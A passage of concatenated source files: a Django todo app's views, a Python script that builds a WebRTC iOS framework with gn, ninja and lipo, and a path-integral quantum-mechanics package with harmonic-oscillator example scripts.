    is passed as a JSON string rather than a Python list.
    """
    todos = list(Todo.objects.all().values())
    print(todos)
    return render(request, 'VueExample.html', {"list": json.dumps(todos)})
def save_view(request):
    """Persist the client's todo list by overwriting all stored rows.

    The POST parameter 'q' holds the full list as JSON; every existing
    Todo is deleted and the posted items are recreated from scratch.
    """
    print(request.POST['q'])
    # Overwrite directly: drop everything, then re-insert the posted list.
    Todo.objects.all().delete()
    for item in json.loads(request.POST['q']):
        Todo.objects.create(title=item['title'], completed=item['completed'])
    return redirect('/')
|
[
"/App/models.py",
"/App/urls.py",
"/App/views.py"
] |
0-u-0/webrtc-ios-script
|
#!/usr/bin/env python
import logging
import os
import subprocess
import sys
def IsRealDepotTools(path):
    """Return True when *path* looks like a real depot_tools checkout."""
    gclient = os.path.join(os.path.expanduser(path), 'gclient.py')
    return os.path.isfile(gclient)
def add_depot_tools_to_path(source_dir=''):
    """Search for depot_tools and add it to sys.path.

    Looks, in order, at <source_dir>/third_party/depot_tools, entries
    already on sys.path, the directories on $PATH, and finally every
    ancestor directory of this script. Returns the directory found (and
    appends/inserts it into sys.path where needed) or None.
    """
    # First, check if we have a DEPS'd in "depot_tools".
    deps_depot_tools = os.path.join(source_dir, 'third_party', 'depot_tools')
    if IsRealDepotTools(deps_depot_tools):
        # Put the pinned version at the start of the sys.path, in case there
        # are other non-pinned versions already on the sys.path.
        sys.path.insert(0, deps_depot_tools)
        return deps_depot_tools
    # Then look if depot_tools is already in PYTHONPATH.
    for i in sys.path:
        if i.rstrip(os.sep).endswith('depot_tools') and IsRealDepotTools(i):
            return i
    # Then look if depot_tools is in PATH, common case.
    for i in os.environ['PATH'].split(os.pathsep):
        if IsRealDepotTools(i):
            sys.path.append(i.rstrip(os.sep))
            return i
    # Rare case, it's not even in PATH, look upward up to root.
    root_dir = os.path.dirname(os.path.abspath(__file__))
    previous_dir = os.path.abspath(__file__)
    while root_dir and root_dir != previous_dir:
        i = os.path.join(root_dir, 'depot_tools')
        if IsRealDepotTools(i):
            sys.path.append(i)
            return i
        previous_dir = root_dir
        root_dir = os.path.dirname(root_dir)
    logging.error('Failed to find depot_tools')
    return None
def _RunCommand(cmd):
    """Run *cmd* (an argv list); raises CalledProcessError on failure."""
    logging.debug('Running: %r', cmd)
    subprocess.check_call(cmd)
def _RunGN(args):
    """Invoke depot_tools' gn.py with the given argument list."""
    logging.info('Gn args : %s', args)
    gn_script = os.path.join(add_depot_tools_to_path(), 'gn.py')
    _RunCommand([sys.executable, gn_script] + args)
def _RunNinja(output_directory, args):
    """Invoke ninja from depot_tools against *output_directory*."""
    logging.info('Ninja args : %s', args)
    ninja_bin = os.path.join(add_depot_tools_to_path(), 'ninja')
    _RunCommand([ninja_bin, '-C', output_directory] + args)
def _EncodeForGN(value):
"""Encodes value as a GN literal."""
if isinstance(value, str):
return '"' + value + '"'
elif isinstance(value, bool):
return repr(value).lower()
else:
return repr(value)
def Build(output_directory, gn_args, ninja_target_args):
    """Generates target architecture using GN and builds it using ninja."""
    # Render the GN args dict as a single space-separated --args string.
    encoded = ['%s=%s' % (k, _EncodeForGN(v)) for k, v in gn_args.items()]
    _RunGN(['gen', output_directory, '--args=' + ' '.join(encoded)])
    _RunNinja(output_directory, ninja_target_args)
--- FILE SEPARATOR ---
#!/usr/bin/env python
import os
import argparse
import logging
import sys
from distutils import dir_util
from build_tools import Build, _RunCommand
# disable x86-64 when you intend to distribute app through the app store
# https://webrtc.github.io/webrtc-org/native-code/ios/
# DEFAULT_ARCHS = ['arm64', 'arm', 'x64', 'x86']
DEFAULT_ARCHS = ['arm64', 'arm', 'x64']
TARGETS = ['sdk:framework_objc']
OUT_DIR = 'out'  # build output root, relative to the WebRTC source dir
SDK_FRAMEWORK_NAME = 'WebRTC.framework'
def parse_args():
    """Define and parse the command-line options for this build script."""
    arg_parser = argparse.ArgumentParser(description='Collect and build WebRTC iOS framework.')
    arg_parser.add_argument('-s', '--source-dir', help='WebRTC source dir. Example: /realpath/to/src')
    arg_parser.add_argument('-v', '--verbose', action='store_true', help='Debug logging.')
    arg_parser.add_argument('-r', '--is-release', action='store_true', help='Release or not.')
    arg_parser.add_argument('--use-bitcode', action='store_true', help='Use bitcode or not.')
    arg_parser.add_argument('--enable-vp9', action='store_true', help='Enable VP9 SoftCodec or not.')
    return arg_parser.parse_args()
def get_debug_dir(is_debug):
    """Map the debug flag to the conventional output directory name."""
    return 'Debug' if is_debug else 'Release'
def build_ios_framework(src_dir, is_debug, bitcode):
    """Build the WebRTC framework target once per architecture.

    Parameters:
        src_dir: Root of the WebRTC source checkout.
        is_debug: Build Debug (True) or Release (False).
        bitcode: Embed bitcode; dSYM generation is disabled when on.
    """
    gn_args = {
        'target_os': 'ios',
        'ios_enable_code_signing': False,
        'use_xcode_clang': True,
        'is_debug': is_debug,
        'ios_deployment_target': '10.0',
        'enable_stripping': True,
        # dSYMs and bitcode are configured as mutually exclusive here.
        'enable_dsyms': not bitcode,
        'enable_ios_bitcode': bitcode
    }
    ninja_target_args = TARGETS
    for arch in DEFAULT_ARCHS:
        # The same dict is reused across iterations; only target_cpu changes.
        gn_args['target_cpu'] = arch
        build_dir = os.path.join(src_dir, OUT_DIR, get_debug_dir(is_debug), arch)
        logging.info('Build dir : %s', build_dir)
        Build(build_dir, gn_args, ninja_target_args)
def create_fat_library(src_dir, is_debug):
    """Merge the per-architecture frameworks into one universal binary.

    Copies the first architecture's WebRTC.framework (and WebRTC.dSYM,
    when present) into the combined output directory, then lipo-merges
    the dylib (and DWARF) slices from every architecture into it.
    """
    output_dir = os.path.join(src_dir, OUT_DIR, get_debug_dir(is_debug))
    lib_paths = [os.path.join(output_dir, arch)
                 for arch in DEFAULT_ARCHS]
    # Combine the slices.
    dylib_path = os.path.join(SDK_FRAMEWORK_NAME, 'WebRTC')
    # Dylibs will be combined, all other files are the same across archs.
    # Use distutils instead of shutil to support merging folders.
    dir_util.copy_tree(
        os.path.join(lib_paths[0], SDK_FRAMEWORK_NAME),
        os.path.join(output_dir, SDK_FRAMEWORK_NAME))
    logging.info('Merging framework slices.')
    dylib_paths = [os.path.join(path, dylib_path) for path in lib_paths]
    out_dylib_path = os.path.join(output_dir, dylib_path)
    # Remove any stale merged dylib before lipo writes the new one.
    try:
        os.remove(out_dylib_path)
    except OSError:
        pass
    cmd = ['lipo'] + dylib_paths + ['-create', '-output', out_dylib_path]
    _RunCommand(cmd)
    # Merge the dSYM slices.
    lib_dsym_dir_path = os.path.join(lib_paths[0], 'WebRTC.dSYM')
    if os.path.isdir(lib_dsym_dir_path):
        dir_util.copy_tree(lib_dsym_dir_path, os.path.join(output_dir, 'WebRTC.dSYM'))
        logging.info('Merging dSYM slices.')
        dsym_path = os.path.join('WebRTC.dSYM', 'Contents', 'Resources', 'DWARF', 'WebRTC')
        lib_dsym_paths = [os.path.join(path, dsym_path) for path in lib_paths]
        out_dsym_path = os.path.join(output_dir, dsym_path)
        # Remove any stale merged DWARF file before lipo writes the new one.
        try:
            os.remove(out_dsym_path)
        except OSError:
            pass
        cmd = ['lipo'] + lib_dsym_paths + ['-create', '-output', out_dsym_path]
        _RunCommand(cmd)
    logging.info('Done.')
def main():
    """Entry point: locate the WebRTC source tree and build the framework."""
    args = parse_args()
    logging.basicConfig(level=logging.DEBUG if args.verbose else logging.INFO)

    # Default to the parent of the working directory when no source dir given.
    src_dir = args.source_dir or os.path.abspath(os.path.join(os.getcwd(), os.pardir))

    if not os.path.isdir(src_dir):
        logging.error('Src path not exists : %s', src_dir)
        return

    is_debug = not args.is_release
    build_ios_framework(src_dir, is_debug, args.use_bitcode)
    create_fat_library(src_dir, is_debug)

if __name__ == '__main__':
    sys.exit(main())
|
[
"/build_tools.py",
"/main.py"
] |
0/pathintmatmult
|
#!/usr/bin/env python3
"""
Harmonic oscillator PIFT example.
An oscillator with an angular frequency of x kelvin at reciprocal temperature
beta reciprocal kelvin has a thermal potential energy (in kelvin) of
(1/4) x coth(0.5 beta x)
and a total energy of twice that. For example, for an oscillator with an
angular frequency of 1 K, at 0.1 K the thermal averages are approximately
0.2500 K and 0.5000 K (very nearly the zero point energies), while at 10 K they
are approximately 5.0042 K and 10.008 K. By 100 K, the total energy is about
100.00 K, so we are effectively at the classical limit.
"""
from argparse import ArgumentParser
from pathintmatmult import PIFTMM
from pathintmatmult.constants import HBAR, KB, ME
from pathintmatmult.potentials import harmonic_potential
# Parse arguments.
p = ArgumentParser(description='Calculate HO thermal properties using PIFTMM.')
p_config = p.add_argument_group('configuration')
p_config.add_argument('--mass', metavar='M', type=float, required=True, help='particle mass (electron masses)')
p_config.add_argument('--omega', metavar='W', type=float, required=True, help='angular frequency (K)')
p_config.add_argument('--grid-range', metavar='R', type=float, required=True, help='grid range from origin (nm)')
p_config.add_argument('--grid-len', metavar='L', type=int, required=True, help='number of points on grid')
p_config.add_argument('--beta', metavar='B', type=float, required=True, help='reciprocal temperature (1/K)')
p_config.add_argument('--num-links', metavar='P', type=int, required=True, help='number of links')
p.add_argument('--density-out', metavar='FILE', help='path to output density plot')
args = p.parse_args()

# Convert the kelvin-based command-line values to the internal unit
# system; the trailing comment on each line is the resulting unit.
mass = args.mass * ME  # g/mol
omega = args.omega * KB / HBAR  # 1/ps
grid_range = args.grid_range  # nm
grid_len = args.grid_len  # 1
beta = args.beta / KB  # mol/kJ
num_links = args.num_links  # 1
density_out = args.density_out

# Calculate values.
harmonic = harmonic_potential(m=mass, w=omega)
ho_pift = PIFTMM([mass], [grid_range], [grid_len], harmonic, beta, num_links)
estimated_potential_energy = ho_pift.expectation_value(harmonic) / KB  # K
print('V = {} K'.format(estimated_potential_energy))
# According to the virial theorem, <K> = <V> for a harmonic oscillator.
print('E_virial = {} K'.format(2 * estimated_potential_energy))

# Output plot.
if density_out:
    # Imported here so plotting dependencies are only needed when a plot
    # is actually requested.
    from pathintmatmult.plotting import plot2d
    xy_range = (-grid_range, grid_range)
    plot2d(ho_pift.density, xy_range, xy_range, density_out, x_label=r'$q_j / \mathrm{nm}$', y_label=r'$q_i / \mathrm{nm}$')
--- FILE SEPARATOR ---
#!/usr/bin/env python3
"""
Harmonic oscillator PIGS example.
An oscillator with an angular frequency of x kelvin has a ground state
potential energy of x/4 kelvin and a total energy of x/2 kelvin. One with a
mass of 1 electron mass and angular frequency of 1 K has a spread of about 120
nm in either direction from the origin; one with a mass of 10 electron masses
spreads about 40 nm. The following are some possible combinations of arguments
to try:
--mass 1 --omega 1 --grid-range 120 --grid-len 100 --beta 12 --num-links 1200
--mass 10 --omega 1 --grid-range 40 --grid-len 100 --beta 12 --num-links 1200
If --trial-deform is not given, a uniform trial function is used. If it is
given, the exact ground state is used as the trial function, but is deformed by
the given factor (1 corresponds to no deformation).
"""
from argparse import ArgumentParser
import numpy as np
from pathintmatmult import PIGSMM
from pathintmatmult.constants import HBAR, KB, ME
from pathintmatmult.potentials import harmonic_potential
# Parse arguments.
p = ArgumentParser(description='Calculate HO ground state properties using PIGSMM.')
p_config = p.add_argument_group('configuration')
p_config.add_argument('--mass', metavar='M', type=float, required=True, help='particle mass (electron masses)')
p_config.add_argument('--omega', metavar='W', type=float, required=True, help='angular frequency (K)')
p_config.add_argument('--grid-range', metavar='R', type=float, required=True, help='grid range from origin (nm)')
p_config.add_argument('--grid-len', metavar='L', type=int, required=True, help='number of points on grid')
p_config.add_argument('--beta', metavar='B', type=float, required=True, help='propagation length (1/K)')
p_config.add_argument('--num-links', metavar='P', type=int, required=True, help='number of links')
p_config.add_argument('--trial-deform', metavar='D', type=float, help='deformation factor for exact trial function')
p.add_argument('--wf-out', metavar='FILE', help='path to output wavefunction values')
p.add_argument('--density-out', metavar='FILE', help='path to output density plot')
args = p.parse_args()

# Convert the kelvin-based command-line values to the internal unit
# system; the trailing comment on each line is the resulting unit.
mass = args.mass * ME  # g/mol
omega = args.omega * KB / HBAR  # 1/ps
grid_range = args.grid_range  # nm
grid_len = args.grid_len  # 1
beta = args.beta / KB  # mol/kJ
num_links = args.num_links  # 1
trial_deform = args.trial_deform
wf_out = args.wf_out
density_out = args.density_out

# Calculate values.
harmonic = harmonic_potential(m=mass, w=omega)

kwargs = {}
if trial_deform is not None:
    # Use the (optionally deformed) exact ground state as the trial
    # function; trial_deform == 1 corresponds to no deformation.
    alpha = trial_deform * mass * omega / HBAR  # 1/nm^2
    def trial_f(q: 'nm') -> '1':
        # Gaussian form of the harmonic oscillator ground state.
        return np.exp(-0.5 * alpha * q[..., 0] ** 2)
    def trial_f_diff(q: 'nm') -> '1/nm^2':
        # Second spatial derivative of trial_f.
        return alpha * (alpha * q[..., 0] ** 2 - 1) * trial_f(q)
    kwargs['trial_f'] = trial_f
    kwargs['trial_f_diffs'] = [trial_f_diff]

ho_pigs = PIGSMM([mass], [grid_range], [grid_len], harmonic, beta, num_links, **kwargs)
estimated_potential_energy = ho_pigs.expectation_value(harmonic) / KB  # K
estimated_total_energy = ho_pigs.energy_mixed / KB  # K
print('V = {} K'.format(estimated_potential_energy))
# According to the virial theorem, <K> = <V> for a harmonic oscillator.
print('E_virial = {} K'.format(2 * estimated_potential_energy))
print('E_mixed = {} K'.format(estimated_total_energy))

# Output wavefunction.
if wf_out:
    # Columns: grid point, ground-state wavefunction value.
    np.savetxt(wf_out, np.hstack((ho_pigs.grid, ho_pigs.ground_wf[:, np.newaxis])))

# Output plot.
if density_out:
    # Imported here so plotting dependencies are only needed when a plot
    # is actually requested.
    from pathintmatmult.plotting import plot2d
    xy_range = (-grid_range, grid_range)
    plot2d(ho_pigs.density, xy_range, xy_range, density_out, x_label=r'$q_j / \mathrm{nm}$', y_label=r'$q_i / \mathrm{nm}$')
--- FILE SEPARATOR ---
#!/usr/bin/env python3
"""
Entangled harmonic oscillators PIGS example.
A pair of identical harmonic oscillators with a harmonic interaction potential.
"""
from argparse import ArgumentParser
import numpy as np
from pathintmatmult import PIGSIMM
from pathintmatmult.constants import HBAR, KB, ME
from pathintmatmult.potentials import harmonic_potential
# Parse arguments.
p = ArgumentParser(description='Calculate entangled HO ground state properties using PIGSMM2.')
p_config = p.add_argument_group('configuration')
p_config.add_argument('--mass', metavar='M', type=float, required=True, help='particle mass (electron masses)')
p_config.add_argument('--omega-0', metavar='W', type=float, required=True, help='central potential angular frequency (K)')
p_config.add_argument('--omega-int', metavar='W', type=float, required=True, help='interaction potential angular frequency (K)')
p_config.add_argument('--grid-range', metavar='R', type=float, required=True, help='grid range from origin (nm)')
p_config.add_argument('--grid-len', metavar='L', type=int, required=True, help='number of points on grid')
p_config.add_argument('--beta', metavar='B', type=float, required=True, help='propagation length (1/K)')
p_config.add_argument('--num-links', metavar='P', type=int, required=True, help='number of links')
p_config.add_argument('--trial-deform', metavar='D', type=float, help='deformation factor for exact trial function')
p.add_argument('--wf-out', metavar='FILE', help='path to output wavefunction values')
p.add_argument('--density-diagonal-out', metavar='FILE', help='path to output diagonal density plot')
args = p.parse_args()

# Convert the kelvin-based command-line values to the internal unit
# system; the trailing comment on each line is the resulting unit.
mass = args.mass * ME  # g/mol
omega_0 = args.omega_0 * KB / HBAR  # 1/ps
omega_int = args.omega_int * KB / HBAR  # 1/ps
grid_range = args.grid_range  # nm
grid_len = args.grid_len  # 1
beta = args.beta / KB  # mol/kJ
num_links = args.num_links  # 1
trial_deform = args.trial_deform
wf_out = args.wf_out
density_diagonal_out = args.density_diagonal_out

# Calculate values.
pot_0 = harmonic_potential(m=mass, w=omega_0)
pot_int = harmonic_potential(m=mass, w=omega_int)

def total_potential(qs: '[nm]') -> 'kJ/mol':
    # Central well for each particle plus a harmonic coupling on their
    # separation.
    return pot_0(qs[..., [0]]) + pot_0(qs[..., [1]]) + pot_int(qs[..., [0]] - qs[..., [1]])

kwargs = {}
if trial_deform is not None:
    # Use the (optionally deformed) exact ground state, expressed in the
    # normal-mode frequencies of the coupled pair, as the trial function.
    alpha = trial_deform * mass / HBAR  # ps/nm^2
    omega_R = omega_0  # 1/ps
    omega_r = np.sqrt(omega_0 * omega_0 + 2 * omega_int * omega_int)  # 1/ps
    omega_p = omega_R + omega_r  # 1/ps
    omega_m = omega_R - omega_r  # 1/ps
    def trial_f(qs: '[nm]') -> '1':
        return np.exp(-0.25 * alpha * (omega_p * (qs[..., 0] ** 2 + qs[..., 1] ** 2) + 2 * omega_m * qs[..., 0] * qs[..., 1]))
    def trial_f_diff_0(qs: '[nm]') -> '1/nm^2':
        # Second derivative of trial_f with respect to the first coordinate.
        return 0.5 * alpha * (0.5 * alpha * (omega_p * qs[..., 0] + omega_m * qs[..., 1]) ** 2 - omega_p) * trial_f(qs)
    def trial_f_diff_1(qs: '[nm]') -> '1/nm^2':
        # Second derivative of trial_f with respect to the second coordinate.
        return 0.5 * alpha * (0.5 * alpha * (omega_m * qs[..., 0] + omega_p * qs[..., 1]) ** 2 - omega_p) * trial_f(qs)
    kwargs['trial_f'] = trial_f
    kwargs['trial_f_diffs'] = [trial_f_diff_0, trial_f_diff_1]

ho_pigs = PIGSIMM([mass, mass], [grid_range, grid_range], [grid_len, grid_len], total_potential, beta, num_links, **kwargs)
estimated_potential_energy = ho_pigs.expectation_value(total_potential) / KB  # K
estimated_total_energy = ho_pigs.energy_mixed / KB  # K
estimated_trace = ho_pigs.trace_renyi2
print('V = {} K'.format(estimated_potential_energy))
print('E_mixed = {} K'.format(estimated_total_energy))
print('trace = {}'.format(estimated_trace))

# Output wavefunction.
if wf_out:
    # Columns: grid point, ground-state wavefunction value.
    np.savetxt(wf_out, np.hstack((ho_pigs.grid, ho_pigs.ground_wf[:, np.newaxis])))

# Output plot.
if density_diagonal_out:
    # Imported here so plotting dependencies are only needed when a plot
    # is actually requested.
    from pathintmatmult.plotting import plot2d
    xy_range = (-grid_range, grid_range)
    density = ho_pigs.density_diagonal.reshape(grid_len, grid_len)
    plot2d(density, xy_range, xy_range, density_diagonal_out, x_label=r'$q_2 / \mathrm{nm}$', y_label=r'$q_1 / \mathrm{nm}$')
--- FILE SEPARATOR ---
from .nmm import PIFTMM, PIGSIMM, PIGSMM
--- FILE SEPARATOR ---
"""
Numerical matrix multiplication for path integrals.
"""
from itertools import product
import numpy as np
from .constants import HBAR
from .tools import cached
class PIMM:
    """
    Path Integrals via Matrix Multiplication

    Base class for various kinds of path integral implementations.
    """

    def __init__(self, masses: '[g/mol]', grid_ranges: '[nm]',
                 grid_lens: '[1]', pot_f: '[nm] -> kJ/mol',
                 beta: 'mol/kJ', num_links: '1'):
        """
        Note:
            When pot_f receives an N-dimensional array as input, it needs to map
            over it, returning an (N-1)-dimensional array.

        Note:
            The "particles" are actually any Cartesian degrees of freedom. One
            might have the same configuration (masses and grids) for a
            3-dimensional 1-particle system as for a 1-dimensional 3-particle
            system. Of course, the coordinate arrays must be interpreted
            appropriately in each case (whether by the potential function or by
            the user of the output density).

        Parameters:
            masses: Masses of the particles.
            grid_ranges: Where the grids are truncated. Each grid is symmetric
                about the origin.
            grid_lens: How many points are on the grids.
            beta: Propagation length of the entire path.
            num_links: Number of links in the entire path.
            pot_f: Potential experienced by the particles in some spatial
                configuration.
        """
        assert len(masses) == len(grid_ranges) == len(grid_lens), \
            'Numbers of configuration items must match.'
        assert all(m > 0 for m in masses), 'Masses must be positive.'
        assert all(gr > 0 for gr in grid_ranges), 'Grids must have positive lengths.'
        assert all(gl >= 2 for gl in grid_lens), 'Grids must have at least two points.'
        assert beta > 0, 'Beta must be positive.'
        assert num_links >= 2, 'Must have at least two links.'

        self._masses = np.array(masses)
        self._grid_ranges = np.array(grid_ranges)
        self._grid_lens = np.array(grid_lens)
        self._pot_f = pot_f
        self._beta = beta
        self._num_links = num_links

        # For cached decorator.
        self._cached = {}

    @property
    def masses(self) -> '[g/mol]':
        return self._masses

    @property
    def grid_ranges(self) -> '[nm]':
        return self._grid_ranges

    @property
    def grid_lens(self) -> '[1]':
        return self._grid_lens

    @property
    def pot_f(self) -> '[nm] -> kJ/mol':
        return self._pot_f

    @property
    def beta(self) -> 'mol/kJ':
        return self._beta

    @property
    def num_links(self) -> '1':
        return self._num_links

    @property
    @cached
    def tau(self) -> 'mol/kJ':
        """
        High-temperature propagator length.
        """
        return self.beta / self.num_links

    @property
    @cached
    def num_points(self) -> '1':
        """
        Number of points in the coordinate vector.
        """
        return np.prod(self.grid_lens)

    @property
    @cached
    def grid(self) -> '[[nm]]':
        """
        Vector of the positions corresponding to the grid points.

        This is not a vector in the sense of a 1-dimensional array, because
        each element is itself a vector of coordinates for each particle.
        However, it can be thought of as the tensor product of the
        1-dimensional position vectors.
        """
        grids = [np.linspace(-gr, gr, gl) for (gr, gl) in zip(self.grid_ranges, self.grid_lens)]
        # itertools.product enumerates every combination of per-particle
        # grid points, giving one row per configuration.
        result = np.array(list(product(*grids)))
        assert result.shape == (self.num_points, len(self.masses))
        return result

    @property
    @cached
    def volume_element(self) -> 'nm^N':
        """
        Effective volume taken up by each grid point.
        """
        # Product of the per-axis grid spacings.
        return np.prod(2 * self.grid_ranges / (self.grid_lens - 1))

    @property
    @cached
    def pot_f_grid(self) -> '[kJ/mol]':
        """
        Potential function evaluated on the grid.
        """
        return self.pot_f(self.grid)

    @property
    @cached
    def rho_tau(self) -> '[[1/nm^N]]':
        """
        Matrix for the high-temperature propagator.
        """
        prefactors_K = self.masses / (2 * HBAR * HBAR * self.tau)  # [1/nm^2]
        prefactor_V = self.tau / 2  # mol/kJ
        prefactor_front = np.sqrt(np.prod(prefactors_K) / np.pi)  # 1/nm^N

        K = np.empty((self.num_points, self.num_points))  # [[nm^2]]
        V = np.empty_like(K)  # [[kJ/mol]]

        # Fill the kinetic (Gaussian) exponent and the symmetrized potential
        # for every pair of grid configurations. NOTE(review): this is an
        # O(num_points^2) Python loop and dominates setup time.
        for i, q_i in enumerate(self.grid):
            for j, q_j in enumerate(self.grid):
                K[i, j] = np.sum(prefactors_K * (q_i - q_j) ** 2)
                V[i, j] = self.pot_f_grid[i] + self.pot_f_grid[j]

        return prefactor_front * np.exp(-K - prefactor_V * V)

    @property
    def density_diagonal(self):
        # Provided by the concrete subclasses.
        raise NotImplementedError()

    def expectation_value(self, property_f: '[nm] -> X') -> 'X':
        """
        Expectation value of property_f.

        Note:
            This is only implemented for properties that are diagonal in the
            position representation.

        Note:
            When property_f receives an N-dimensional array as input, it should
            behave in the same manner as pot_f.
        """
        return np.dot(self.density_diagonal, property_f(self.grid))
class PIFTMM(PIMM):
    """
    Path Integral at Finite Temperature via Matrix Multiplication

    Calculate the approximate thermal density matrix of a system comprised of
    one or more particles in an arbitrary potential on a discretized and
    truncated grid. The density matrix is determined via numerical matrix
    multiplication of high-temperature matrices.
    """

    @property
    @cached
    def rho_beta(self) -> '[[1/nm^N]]':
        """
        Matrix for the full path propagator.
        """
        power = self.num_links - 1
        # Diagonalize the (symmetric) high-temperature propagator so that
        # taking the matrix power is just a power of the eigenvalues.
        eigvals, eigvecs = np.linalg.eigh(self.volume_element * self.rho_tau)
        result = np.dot(np.dot(eigvecs, np.diag(eigvals ** power)), eigvecs.T)
        return result / self.volume_element

    @property
    @cached
    def density(self) -> '[[1]]':
        """
        Normalized thermal density matrix.
        """
        rho = self.rho_beta
        # Normalize into a fresh array. The previous implementation used an
        # in-place division (/=), which mutated the array object cached for
        # rho_beta, silently corrupting any later reads of that property.
        return rho / rho.diagonal().sum()

    @property
    @cached
    def density_diagonal(self) -> '[1]':
        """
        Normalized thermal diagonal density.
        """
        return self.density.diagonal()
class PIGSMM(PIMM):
    """
    Path Integral Ground State via Matrix Multiplication

    Calculate the approximate ground state wavefunction of a system comprised
    of one or more particles in an arbitrary potential on a discretized and
    truncated grid. The wavefunction is determined via imaginary time
    propagation from a trial function using numerical matrix multiplication.
    """

    def __init__(self, masses: '[g/mol]', grid_ranges: '[nm]',
                 grid_lens: '[1]', pot_f: '[nm] -> kJ/mol',
                 beta: 'mol/kJ', num_links: '1', *,
                 trial_f: '[nm] -> 1' = None,
                 trial_f_diffs: '[[nm] -> 1/nm^2]' = None):
        """
        See PIMM.__init__ for more details.

        Note:
            The convention used is that beta represents the entire path, so the
            propagation length from the trial function to the middle of the path
            is beta/2.

        Note:
            When trial_f receives an N-dimensional array as input, it should
            behave in the same manner as pot_f.

        Parameters:
            trial_f: Approximation to the ground state wavefunction. If none is
                provided, a uniform trial function is used.
            trial_f_diffs: Second derivatives of trial_f. One function must be
                specified for each particle.
        """
        super().__init__(masses, grid_ranges, grid_lens, pot_f, beta, num_links)

        # An even number of links is needed so the path splits into two
        # equal halves around the middle bead.
        assert num_links % 2 == 0, 'Number of links must be even.'

        if trial_f is not None:
            assert trial_f_diffs is not None, 'Derivatives must be provided.'
            assert len(trial_f_diffs) == len(masses), 'Number of derivatives must match.'

        self._trial_f = trial_f
        self._trial_f_diffs = trial_f_diffs

    @property
    def trial_f(self) -> '[nm] -> 1':
        return self._trial_f

    @property
    def trial_f_diffs(self) -> '[[nm] -> 1/nm^2]':
        return self._trial_f_diffs

    @property
    @cached
    def uniform_trial_f_grid(self) -> '[1]':
        """
        Unnormalized uniform trial function evaluated on the grid.
        """
        return np.ones(self.num_points)

    @property
    @cached
    def trial_f_grid(self) -> '[1]':
        """
        Unnormalized trial function evaluated on the grid.
        """
        if self.trial_f is None:
            # Default to a uniform trial function.
            return self.uniform_trial_f_grid

        return self.trial_f(self.grid)

    @property
    @cached
    def uniform_trial_f_diffs_grid(self) -> '[[1/nm^2]]':
        """
        Unnormalized uniform trial function derivatives evaluated on the grid.
        """
        # A constant trial function has vanishing second derivatives.
        return np.zeros(self.grid.T.shape)

    @property
    @cached
    def trial_f_diffs_grid(self) -> '[[1/nm^2]]':
        """
        Unnormalized trial function derivatives evaluated on the grid.
        """
        if self.trial_f is None:
            # Default to a uniform trial function.
            return self.uniform_trial_f_diffs_grid

        result = np.empty(self.grid.T.shape)

        # One row of second-derivative values per particle.
        for i, f in enumerate(self.trial_f_diffs):
            result[i] = f(self.grid)

        return result

    @property
    @cached
    def rho_beta_half(self) -> '[[1/nm^N]]':
        """
        Matrix for the half path propagator.
        """
        power = self.num_links // 2
        # Diagonalize once; the matrix power becomes a power of eigenvalues.
        eigvals, eigvecs = np.linalg.eigh(self.volume_element * self.rho_tau)
        result = np.dot(np.dot(eigvecs, np.diag(eigvals ** power)), eigvecs.T)
        return result / self.volume_element

    @property
    @cached
    def rho_beta(self) -> '[[1/nm^N]]':
        """
        Matrix for the full path propagator.
        """
        return self.volume_element * np.dot(self.rho_beta_half, self.rho_beta_half)

    @property
    @cached
    def ground_wf(self) -> '[1]':
        """
        Normalized ground state wavefunction.
        """
        ground_wf = np.dot(self.rho_beta_half, self.trial_f_grid)
        # Explicitly normalize.
        ground_wf /= np.sqrt(np.sum(ground_wf ** 2))
        return ground_wf

    @property
    @cached
    def density(self) -> '[[1]]':
        """
        Normalized ground state density matrix.
        """
        return np.outer(self.ground_wf, self.ground_wf)

    @property
    @cached
    def density_diagonal(self) -> '[1]':
        """
        Normalized ground state diagonal density.
        """
        return self.ground_wf ** 2

    @property
    @cached
    def energy_mixed(self) -> 'kJ/mol':
        """
        Ground state energy calculated using the mixed estimator.
        """
        ground_wf_full = np.dot(self.rho_beta, self.trial_f_grid)  # [1/nm^N]
        # Kinetic part uses the trial function's second derivatives weighted
        # by the inverse masses.
        trial_f_diffs = np.sum(self.trial_f_diffs_grid / self.masses[:, np.newaxis], axis=0)  # [mol/g nm^2]
        energy_V = np.sum(ground_wf_full * self.pot_f_grid * self.trial_f_grid)  # kJ/mol nm^N
        energy_K = np.dot(ground_wf_full, trial_f_diffs)  # mol/g nm^(N+2)
        normalization = np.dot(ground_wf_full, self.trial_f_grid)  # 1/nm^N
        return (energy_V - 0.5 * HBAR * HBAR * energy_K) / normalization

    @property
    @cached
    def density_reduced(self) -> '[[1]]':
        """
        Density matrix for the first particle, with the other traced out.

        Only implemented for two-particle systems.
        """
        assert len(self.masses) == 2

        new_len = self.grid_lens[0]
        other_len = self.grid_lens[1]
        density_new = np.zeros((new_len, new_len))

        # Trace out the second coordinate directly from the wavefunction,
        # relying on the row-major layout of the product grid.
        for i in range(new_len):
            for j in range(new_len):
                for t in range(other_len):
                    # Avoid computing self.density here.
                    density_new[i, j] += self.ground_wf[other_len * i + t] * self.ground_wf[other_len * j + t]

        return density_new

    @property
    @cached
    def trace_renyi2(self) -> '1':
        """
        Trace of the square of the reduced density matrix.

        The 2nd Rényi entropy is the negative logarithm of this quantity.
        """
        return np.linalg.matrix_power(self.density_reduced, 2).trace()
class PIGSIMM(PIGSMM):
    """
    Path Integral Ground State via Implicit Matrix Multiplication

    Calculate the approximate ground state wavefunction of a system comprised
    of one or more particles in an arbitrary potential on a discretized and
    truncated grid. The wavefunction is determined via imaginary time
    propagation from a trial function using implicit numerical matrix-vector
    multiplication, where the full density matrix is never constructed.
    """

    @property
    def rho_tau(self):
        # We don't build any (full) matrices!
        raise NotImplementedError()

    @property
    def rho_beta_half(self):
        raise NotImplementedError()

    @property
    def rho_beta(self):
        raise NotImplementedError()

    def _propagate_trial(self, start_grid: '[1]', power: '1') -> '[1]':
        """
        Multiply start_grid by (rho_tau ** power).
        """
        prefactors_K = self.masses / (2 * HBAR * HBAR * self.tau)  # [1/nm^2]
        pot_exp = np.exp(-0.5 * self.tau * self.pot_f_grid)  # [1]

        temp_wf1 = start_grid.copy()  # [1]
        temp_wf2 = np.zeros_like(temp_wf1)  # [1]

        for _ in range(power):
            # Apply half the potential factor, then the kinetic (Gaussian)
            # spreading, then the other half of the potential factor.
            temp_wf1 *= pot_exp

            for q, wf in zip(self.grid, temp_wf1):
                # The temporary array here is the same shape as self.grid.
                temp_wf2 += np.exp(-np.sum(prefactors_K * (self.grid - q) ** 2, axis=1)) * wf

            temp_wf2 *= pot_exp

